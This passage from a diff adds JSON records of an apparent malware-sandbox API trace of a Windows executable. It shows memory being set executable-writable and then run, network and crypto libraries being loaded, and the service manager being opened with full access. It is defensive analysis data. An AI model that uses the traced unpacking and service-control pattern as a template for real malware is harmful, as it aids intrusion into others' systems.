"0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 327 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73ca0000" + }, + { + "name": "ModuleName", + "value": "comctl32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 328 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000042" + }, + { + "name": "uiParam", + "value": "0x0000000c" + } + ], + "repeated": 0, + "id": 329 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d32000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 330 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d34000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 331 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000002ac" + }, + { + "name": "DesiredAccess", + "value": "0x00000009", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" + } + ], + "repeated": 0, + "id": 332 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000002ac" + }, + { + "name": "ValueName", + "value": "ResourcePolicies" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" + } + ], + "repeated": 0, + "id": 333 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002ac" + } + ], + "repeated": 0, + "id": 334 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02580000" + }, + { + "name": "RegionSize", + "value": "0x00008000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 335 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02580000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 336 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000042" + }, + { + "name": "uiParam", + "value": "0x0000000c" + } + ], + "repeated": 1, + "id": 337 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 338 + }, + { + "timestamp": "2025-03-07 22:33:08,032", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 339 + }, + { + "timestamp": "2025-03-07 22:33:08,047", + "thread_id": "9440", + "caller": "0x004337e2", + "parentcaller": "0x00000000", + "category": "misc", + "api": "FindResourceExA", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "Module", + "value": "0x00400000" + }, + { + "name": "Type", + "value": "#240" + }, + { + "name": "Name", + "value": "#102" + }, + { + "name": "Language", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 340 + }, + { + "timestamp": "2025-03-07 22:33:08,047", + "thread_id": "9440", + "caller": "0x00402f02", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x025b0000" + }, + { + "name": "RegionSize", + "value": "0x00009000" + }, + { + "name": "Protection", + "value": "0x00000040", + "pretty_value": "PAGE_EXECUTE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 341 + }, + { + "timestamp": "2025-03-07 22:33:08,047", + "thread_id": "9440", + "caller": "0x025b0115", + "parentcaller": "0x00000000", + "category": "system", + "api": "GetSystemTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 342 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x025b0115", + "parentcaller": "0x025b0115", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03ce0000" + }, + { + "name": "RegionSize", + "value": "0x0000c000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 343 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x025b03ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03ce1000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00007000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000020", + "pretty_value": "PAGE_EXECUTE_READ" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 344 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x025b03ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03ce8000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 345 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x025b03ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03ce9000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00020000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 346 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x025b03ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03ceb000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 347 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce2eba", + "parentcaller": "0x03ce2e32", + "category": "system", + "api": "GetSystemTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 348 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce2eba", + "parentcaller": "0x03ce2eba", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "NTDLL" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + } + ], + "repeated": 0, + "id": 349 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "advapi32.dll" + }, + { + "name": "BaseAddress", + "value": "0x762a0000" + } + ], + "repeated": 0, + "id": 350 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "crypt32.dll" + }, + { + "name": "BaseAddress", + "value": "0x767c0000" + } + ], + "repeated": 0, + "id": 351 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "shell32.dll" + }, + { + "name": "BaseAddress", + "value": "0x75950000" + } + ], + "repeated": 0, + "id": 352 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "shlwapi.dll" + }, + { + "name": "BaseAddress", + "value": "0x754e0000" + } + ], + "repeated": 0, + "id": 353 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\iertutil" + }, + { + "name": "DllBase", + "value": "0x734e0000" + } + ], + "repeated": 0, + "id": 354 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\srvcli" + }, + { + "name": "DllBase", + "value": "0x73e40000" + } + ], + "repeated": 0, + "id": 355 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\netutils" + }, + { + "name": "DllBase", + "value": "0x745d0000" + } + ], + "repeated": 0, + "id": 356 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\urlmon" + }, + { + "name": "DllBase", + "value": "0x73710000" + } + ], + "repeated": 0, + "id": 357 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "urlmon.dll" + }, + { + "name": "BaseAddress", + "value": "0x73710000" + } + ], + "repeated": 0, + "id": 358 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\userenv" + }, + { + "name": "DllBase", + "value": "0x73e10000" + } + ], + "repeated": 0, + "id": 359 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "userenv.dll" + }, + { + "name": "BaseAddress", + "value": "0x73e10000" + } + ], + "repeated": 0, + "id": 360 + }, + { + "timestamp": "2025-03-07 22:33:08,579", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\wininet" + }, + { + "name": "DllBase", + "value": "0x73080000" + } + ], + "repeated": 0, + "id": 361 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 362 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "wininet.dll" + }, + { + "name": "BaseAddress", + "value": "0x73080000" + } + ], + "repeated": 0, + "id": 363 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\wtsapi32" + }, + { + "name": "DllBase", + "value": "0x745e0000" + } + ], + "repeated": 0, + "id": 364 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce4f8d", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "wtsapi32.dll" + }, + { + "name": "BaseAddress", + "value": "0x745e0000" + } + ], + "repeated": 0, + "id": 365 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68d1", + "parentcaller": "0x03ce4b94", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x0070af30", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x000f003f", + "pretty_value": "SC_MANAGER_ALL_ACCESS" + } + ], + "repeated": 0, + "id": 366 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "windows.storage.dll" + } + ], + "repeated": 0, + "id": 367 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + } + ], + "repeated": 0, + "id": 368 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002e8" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 369 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002ec" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 370 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002ec" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74880000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x0060d000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 371 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00002000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 372 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 373 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 374 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e1f000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 375 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "Wldp.dll" + } + ], + "repeated": 0, + "id": 376 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002ec" + } + ], + "repeated": 0, + "id": 377 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 378 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll" + } + ], + "repeated": 0, + "id": 379 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + } + ], + "repeated": 0, + "id": 380 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002e8" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 381 + }, + { + "timestamp": "2025-03-07 22:33:08,594", + "thread_id": "9440", + "caller": "0x03ce68a2", + "parentcaller": "0x03ce4b94", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002ec" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000002e8" + } + ], + "repeated": 0, + "id": 382 + }, + { + "timestamp": "2025-03-07 22:33:08,594", 